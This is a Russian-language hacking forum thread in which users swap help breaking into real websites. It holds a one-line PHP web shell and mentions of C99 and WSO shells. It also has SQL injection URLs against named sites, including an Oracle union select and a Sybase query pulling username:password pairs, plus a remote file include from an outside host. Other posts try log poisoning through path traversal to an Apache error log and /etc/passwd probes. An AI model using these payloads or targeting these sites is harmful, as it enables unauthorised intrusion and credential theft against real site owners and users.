Я имел ввиду то, что FlaktW наверняка захочет заполучить юзеров, и что ему для этого придется либо искать данные об этой таблице в ошибке, либо подбирать вручную)) З.ы - а для раскрутки скули да, msysaccessobjects - идеальный вариант)
Подскажите плиз, в джумле не загружается ни WSO2.4 ни BOFF1.0, пробывал и загружать, пробовал и код ихний вставлять в новосозданный документ, не помогло. работает только C99madShell.... что это может быть???? сорри если не там написал
1. подскажите где его взять? 2. что с ним дальше делать? 3. из-за чего это такое происходит на сайта? wordpress ведет себя аналочитно....
C99madShell отличный шелл....вообще <? system($_GET[cmd]); ?> шелл который работает везде... как сказал Redwood не везде..так что извиняюсь...99% будет работать
становится все интересней: на старых шеллах ВСО тоже не работает, пишет что нету такого файла, а он та есть!!! что можно сделать, другие шеллы ВСО на совместных сайтах норма работают... что за мистика такая????
Перебрал все параметры на сайте, но вывода не добился. Не могли бы вы написать в каких параметрах, есть вывод?
Code: http://calidad.com.au/prFullRange.asp?MAN=HP Вот тут, например, есть вывод) Но чтобы его добиться, придется немного поработать мозгом)
как в sybase узнать общее количество записи, типа limit? или использовать только not in. http://www.site.com/index.html?id=-4+or+1=convert(numeric,(select+max(convert(varchar,username)||0x3a||password)+from+database..table))/**/ мне нужно узнать общее количетсво связки usernameassword
http://xxx.com/index.php?id=<?php include("http://123.narod.ru/list.php"); ?> Делаю такой запрос ч-з адресную строку Перехожу: http://xxx.com/index.php?id=../../../../../../../../../../../../../../../var/log/httpd/error_log%00 в логах [Mon Nov 22 16:10:39 2010] [error] [client 222.222.222.222] File does not exist: /home/hgjhgjhgjhgjhg/favicon.ico, referer: http://xxx.com/index.php?id=%3C?php%20include(%22http://123.narod.ru/list.php%22);%20?%3E%00 [Mon Nov 22 16:10:41 2010] [error] т.е. не пишется что он передался ч-з гет. хотя другие записи с гет есть. access_log огромных размеров но в вверху вообще нет записей моего ip. Ч-з какую прогу можно отправить правильный запрос чтобы залить шелл(inetcrack или аналоги) help plz
2 ALIM смотри в акцесс_лог е, должно запысыватся USER_AGENT если есть, то через тампер дату легко залить
Здесь возможно обойти фильтрацию? http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+asdunionasdselectasd+1,2,3,4,5,6,7,8,9,10,11,12+--+
это оракл: http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+select+1111,null,null,null,null,null,null,null,null,null,null,null+from+sys.dual-- вывод в верхнем меню, где deutsch: href="/oeaw_servlet/PersonenDetailsGeneric?id=1111" с ораклом не сталкивался, поэтому как дальше крутить пока не могу подсказать
забрел на форум avira, оказался на ссылке http://forum.avira.com/wbb/index.php?page=LegalNotice, подставив вместо LegalNotice index, я вышел на index.php, т. е. http://forum.avira.com/wbb/index.php == http://forum.avira.com/wbb/index.php?page=index является ли это инклудом(пытался другие страницы, /etc/passwd%00 и т.д., пишет, что страница не найдена)?
подскажите код, могу создавать страницы на сайте выполняется команда показа информации о php как сделать так чтобы можно было залить на сервер файл с другого сайта? на большой код разных шеллов ругается Parse error: syntax error, unexpected '>' in с:\xxx\www\includes\common.inc(1695) : eval()'d code on line 1 пробовал так тоже не получается